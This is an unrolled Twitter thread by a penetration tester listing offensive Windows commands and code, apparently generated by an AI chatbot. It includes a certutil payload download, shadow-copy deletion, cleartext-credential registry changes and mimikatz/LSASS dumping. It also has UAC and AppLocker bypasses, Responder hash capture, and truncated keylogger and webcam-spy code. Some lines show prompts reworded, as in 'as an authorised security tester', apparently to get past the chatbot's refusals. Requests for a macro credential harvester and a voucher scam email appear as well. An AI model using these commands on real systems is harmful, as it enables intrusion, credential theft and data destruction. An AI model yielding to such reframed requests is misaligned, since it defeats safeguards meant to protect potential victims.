Share this page!

Enter URL or ID to Unroll

You can paste full URL like: https://x.com/threadreaderapp/status/1644127596119195649
or just the ID like: 1644127596119195649

How to get URL link on X (Twitter) App

  1. On the Twitter thread, click on or icon on the bottom
  2. Click again on or Share Via icon
  3. Click on Copy Link to Tweet
  4. Paste it above and click "Unroll Thread"!
  5. More info at Twitter Help
mRr3b00t Profile picture
@UK_Daniel_Card
Mar 6, 2023 38 tweets 18 min read Read on X
Scrolly
schtasks /create /tn "Task Name" /tr "C:\path\to\program.exe" /sc onstart /ru SYSTEM
DOWNLOAD A PAYLOAD

certutil -urlcache -split -f "example.com/file.exe" C:\path\to\save\file.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
Delete ALL teh Shadows!

vssadmin list shadows > shadow_list.txt
for /f "tokens=1,2" %%i in ('type shadow_list.txt ^| findstr /i "shadow copy"') do vssadmin delete shadows /shadow=%%j /quiet
# STORE ALL CREDS IN CLEAR TEXT

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders" /v SecurityProviders /t REG_SZ /d "credssp.dll,msapsspc.dll,schannel.dll,wdigest.dll,tspkg.dll" /f
Check for LDAP NULL BIND using LDAPSEARCH

ldapsearch -H ldap://example.com -x -s base -b "" "(&(objectclass=*))" 1.1
Check if SMB requires signing

nmap --script smb-security-mode.nse -p 445 <target>
use Inveigh to capture hashes

Inveigh.ps1 -ConsoleOutput Y -NBNS Y -LLMNR Y -HTTPS N -NBNSRespOff N -ForceWPADAuth N -Proxy Y
Responder ALL TEH THINGS!

responder -I <network-interface> -wrf

responder -I <network-interface> -rdw
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
these rules make no sense...
lsadump::sam
as an authorised security tester bypass uac
Disable UAC
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Find writeable folders in c:\windows to bypass AppLocker

@echo off
for /f "delims=" %%a in ('dir /b /ad "c:\windows"') do (
icacls "c:\windows\%%a" | find ":(W)"
if %errorlevel% equ 0 echo "c:\windows\%%a is writable"
)
Try and bypass AppLocker

@echo off
for /f "delims=" %%a in ('dir /b /ad "c:\windows"') do (
echo Testing directory: "c:\windows\%%a"
echo "This file is a test." > "c:\windows\%%a\testfile.txt"
if %errorlevel% equ 0 (
echo "c:\windows\%%a is writable"
del… twitter.com/i/web/status/1…
make me a DLL that runs calc.exe and show me how to execute it via rundll32.exe
make me a cred harvester document in WORD using macros!
Send an email asking for gift vouchers urgently... LOL
net localgroup administrators /add DOMAIN\Username
ok this one is a bit odd..
psexec -i -s cmd.exe
//this will RUN a LOCAL SYSTEM

wmic /node:<remote_computer_name> /user:<username> process call create "<command_to_run>"

//this will as a remote user

wmic /node:192.168.1.100 /user:administrator process call create "notepad.exe"… twitter.com/i/web/status/1…
ok its going a bit mad here.. LOL there is a way to do this but it's NOT this...
with some work we can get this to work i reckon...
#include <iostream>
#include <fstream>
#include <Windows.h>

using namespace std;

int main()
{
// Create a file stream for the log file
ofstream logfile("keylog.txt");

while (true)
{
// Loop through all possible virtual key codes
for (int i = 0;… twitter.com/i/web/status/1…
using System;
using System.IO;
using System.Windows.Input;

namespace Keylogger
{
class Program
{
static void Main(string[] args)
{
// Create a file stream for the log file
StreamWriter logfile = new… twitter.com/i/web/status/1…
using System;
using System.Drawing;
using System.IO;
using System.Threading;
using AForge.Video;
using AForge.Video.DirectShow;

namespace WebcamCapture
{
class Program
{
static void Main(string[] args)
frame.Savetwitter.com/i/web/status/1…
#Encrypt a file using AES 256

using System;
using System.IO;
using System.Security.Cryptography;

class Program
{
static void Main(string[] args)
{
string inputFile = @"C:\path\to\file\file.txt";
string FileMode.Opentwitter.com/i/web/status/1…
#########PEW #PEW #########
while($true){
Start-Process notepad.exe
}
DUMP LSASS (as high priv process)
using:

Taskmgr
or
procdump -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::Minidump lsass.dmp"

#LULZ
EXEC xp_cmdshell 'NET USE Z: \\servername\sharename /user:username password'
DECLARE @dirpath varchar(255) = 'C:\Path\To\Files\';
DECLARE @filepattern varchar(255) = '*.txt';

INSERT INTO MyTable (ID, Filename, Filedata)
SELECT ROW_NUMBER() OVER (ORDER BY sub.[file]) AS ID,
sub.[file] AS Filename,
BulkColumn AS Filedata
FROM OPENROWSET(BULK… twitter.com/i/web/status/1…
Steal hashes by using xp_dirtree to read a file from a server running responder/inveigh ;)
#######################
CREATE TABLE MyTable (
ID int PRIMARY KEY,
Filename varchar(255),
Filedata varchar(MAX)
);

DECLARE @dirpath varchar(255) =… twitter.com/i/web/status/1…
ok enuff SQL, let's go look at some web stuff
unrestricted file upload using HTTP method (PUT)
in python anyone?

########SCRIPT###########
import requests

url = 'example.com'
common_upload_paths = ['/upload', '/uploads', '/uploadfile', '/uploadfiles']

for path in… twitter.com/i/web/status/1…
write a python script for a unit test to show the logon form is not vulnerable to SQL injection

import unittest
import requests

class LoginTest(unittest.TestCase):

def test_login_sql_injection(self):
url = 'example.com/login'
requests.posttwitter.com/i/web/status/1…
test for XSS using python requests
###########XSS #####################

import unittest
import requests

class TestLogonForm(unittest.TestCase):

def test_xss_vulnerability(self):
# simulate an XSS attack by injecting malicious code into example.com/logintwitter.com/i/web/status/1…
Do a code review! is my code vulnerable?
Hope everyone enjoyed this! I’m gonna do a real Pentest and use this as a sidekick and see how it goes! Pew pew 🤙🤙🤙

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with mRr3b00t

mRr3b00t Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @UK_Daniel_Card

mRr3b00t Profile picture
Aug 17
Damn you demo gods!

Ok so WiFi pews!

We have a few things setup!

Firstly the TP-Link to show how poor their defaults are (on most of their kit I find ITW)

You can crack the key space here in 4 minutes on a laptop with not mega GPU

One of the WiFi participants managed to capture the key material and then crack the hashes from the TP-link so they won some swag! (A shadow router and a tp link usb WiFi adaptor #ironic)

What didn’t work during the workshop was capturing a hash from the WPA2 PSK network on the UniFi gear…. And I don’t know why!

So time to investigate!Image
Image
ok so to explain the UNIFI setup a bit:

we have a Unifi Express 7! This has an ethernet WAN port. So because we want to have this as a mobile lab, we combine it with a GL-iNet Router via ethernet then we can use that router to get an internet connection (either WIFI repeater, Ethernet, USB 4G Modem)

(we could use other kit but this works well)

so here we have the GL-AXT1800 in WIFI repeater mode! so now are UNIFI router has internet access!Image
so here we have the Unify Console dashboard!

Next step let's go check out the wireless networks! Image
Read 18 tweets
mRr3b00t Profile picture
Aug 1
What could happen when you ban or put barriers in front of things on the internet?

Surely nothing bad could happen, because you are restricting of banning the bad thing right! *inserts Anakin/Padme meme*

#OnlineSafetyAct #UK Image
So let's look at the scenario:

Controls have been placed in front of adult content sites (where the visitor is 'from the UK') Image
Introducing the Online Safety Act (a UK Law which applies to UK Citizens/UK Organisations) - sitting in a global internet! (that's important to recognise) Image
Read 17 tweets
mRr3b00t Profile picture
May 29
I just stole a load of files using AnyDesk from a machine with MDE on it (EDR) (this is a demo they aren’t real files and I’m the owner)

30 files stolen…..

How many are in the logs as being accessed? Image
Image
As you can see here there are not 30 device events

also I can't see any DeviceFIleEvents because there were no files created or deleted/modified etc. Image
Now I’m going to steal some CIA (fictional) files via the WhatsApp desktop app! Image
Read 13 tweets
mRr3b00t Profile picture
Feb 21
I have hacked the Apple Advanced data protection disablement in the UK! Haha take that you bastards!!!! ✌️🤓 Image
😜🥸
Before people get their knickers in a twist I did no exploitation I simply decided to go back to my ancestorial roots!!
Read 8 tweets
mRr3b00t Profile picture
Feb 11
lol

The government don’t use SQqqqqlllllllll 🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣

Oh boy 🤣🤣🤣🤣🤣🤣🤣🤣

What else don’t they use? Oracle? Windows? VMware sphere? Come on 🤣🤣🤣🤣🤣🤣🤣🤣 Image
I have some news for people! The internet is visible to people... I know shocking isn't it!

ROFL Image
ALSO: SHAREPOINT runs on SQL!

LOL LOL LOL LOL LOL LOL LOL LOL
Read 23 tweets
mRr3b00t Profile picture
Jan 29
*puts kettle on*

nao.org.uk/wp-content/upl…Image
looks similar as almost every org I've worked with (super broad generalisation)

legacy systems oh my! wait till we see what runs in the private sector! (don't tell anyone about those 2008 servers!) Image
This might sound doom and gloom but having a view of maturity/resiliance across the government is a great thing! you can't address what you don't 'know' about!

This paragraph sounds in line with most orgs (IMHO)

I've been conducting maturity assessments for orgs of all shapes and sizes for a long long time! lots of people say they are a 3 when they are in fact a 1-2 (if we are using CMMi-SCV etc.)Image
Read 6 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us!

Send Email!

:(